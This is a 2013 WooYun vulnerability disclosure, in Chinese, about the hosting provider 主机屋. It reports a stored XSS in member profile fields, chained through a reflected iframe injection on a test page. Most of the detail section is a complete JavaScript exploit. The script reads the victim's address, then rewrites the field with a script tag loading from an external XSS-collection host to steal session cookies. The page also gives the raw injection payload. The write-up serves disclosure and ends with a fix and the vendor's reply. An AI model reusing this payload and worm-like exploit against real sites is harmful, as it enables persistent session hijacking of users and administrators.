当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2013-042343
漏洞标题:
主机屋XSS回旋镖--自插点的利用
相关厂商:
主机屋
漏洞作者:
xiaoL
提交时间:
2013-11-08 15:03
修复时间:
2013-12-23 15:04
公开时间:
2013-12-23 15:04
漏洞类型:
xss跨站脚本攻击
危害等级:
自评Rank:
10
漏洞状态:
厂商已经确认
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2013-11-08: 细节已通知厂商并且等待厂商处理中
2013-11-12: 厂商已经确认,细节仅向厂商公开
2013-11-22: 细节向核心白帽子及相关领域专家公开
2013-12-02: 细节向普通白帽子公开
2013-12-12: 细节向实习白帽子公开
2013-12-23: 细节向公众公开

简要描述:

主机屋自插点的利用,这样子的利用可以过了吧。

详细说明:

主机屋会员中心个人信息
详细地址
联系人
QQ处都存在存储型XSS

1.gif


插入语句
"><img src=1 onerror=alert(/xss/)><input type=:hidden
本来是一个自插的点,查找并没有发现越权修改个人信息的地方(@小川),本来以为就是个鸡肋。
找着找着,发现这么个地址
http://www.zhujiwu.com/test/test.asp
貌似是检查白名单的地方,真不知道这个URL到底干嘛用的。
插入的url参数直接带入了iframe框架src
简直是白送的XSS,这样就可以从这跳跃到自插的位置了。
于是我们构造javascript

<meta charset="utf8">
<script lnaguage="javascript">
    function createRequest(){
        var xmlHttp=false;
    if(window.XMLHttpRequest){
        xmlHttp = new XMLHttpRequest();
    }else if(window.ActiveXObject){
        try{
            xmlHttp = new ActiveXObject("Msxml2.XMLHTTP");
        }catch(error1){
            try{
                xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
            }catch(error2){
                xmlHttp = false;
            }
        }
    }
        return xmlHttp;
    }
    var getAddress;
    if(getAddress=createRequest()){
        getAddress.open("GET","/member/account/basic.asp");
        getAddress.onreadystatechange=updatePage;
        getAddress.send(null);    
    }
    var xml;
    function updatePage()
    {
        if(getAddress.readyState == 4 )
        {
            if(getAddress.status == 200)
            {
                var str = getAddress.responseText;
                rex = /name="Address" value="(.*)" size="38"/;
                var ttt = rex.exec(str);
                if(xml=createRequest()){
                    xml.open("POST","/cmd/member/setBasic.asp?cmd=set");
                    xml.onreadystatechange = attack;
                    var body = "areaID=0&provinceID=1&cityID=1&Address="+encodeURI(ttt[1])+"%22%3E%3Cscript%20src%3Dhttp%3A%2F%2Fxssl.sinaapp.com%2F0S3c9D%3F1383890465%3E%3C%2Fscript%3E%3Cinput%20type%3D%22hidden&=&LinkMan=asdf&Tel=12345789&QQ=123456789&=%E4%BF%9D%E5%AD%98%E4%BF%AE%E6%94%B9&";
                    xml.setRequestHeader("Content-type","application/x-www-form-urlencoded");
                    xml.send(body);                
                }
            }else if(getAddress.status==404){
                alert("404");
            }else {
                alert("status:"+getAddress.statusText);
            }
        }
    }
    function attack(){
        if(xml.readyState == 4 ){
            if(xml.status == 200){                
            }
        }
    }
</script>


能够获取当前详细地址,再插入自己的代码,当成伪装了。
主机屋并没有HTTPonly
演示最后的过程
发送我们访问的地址:
http://www.zhujiwu.com/test/test.asp?url=xxxxx.sinaapp.com/xxxx.html
不能暴露sae地址,类似这样的地址。
原始页面:

2.png


访问url后:

3.png


5.png


收到的cookie

7.png


漏洞证明:

个人信息能看到的人还是很多的,比如管理员啊!
这样伪装还能永久劫持个人用户!
如上!

修复方案:

编码输出那三个位置就可以了!

版权声明:转载请注明来源 xiaoL@乌云

>

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2013-11-12 15:01

厂商回复:

感谢关注主机屋安全,已将此页面删除

最新状态:

暂无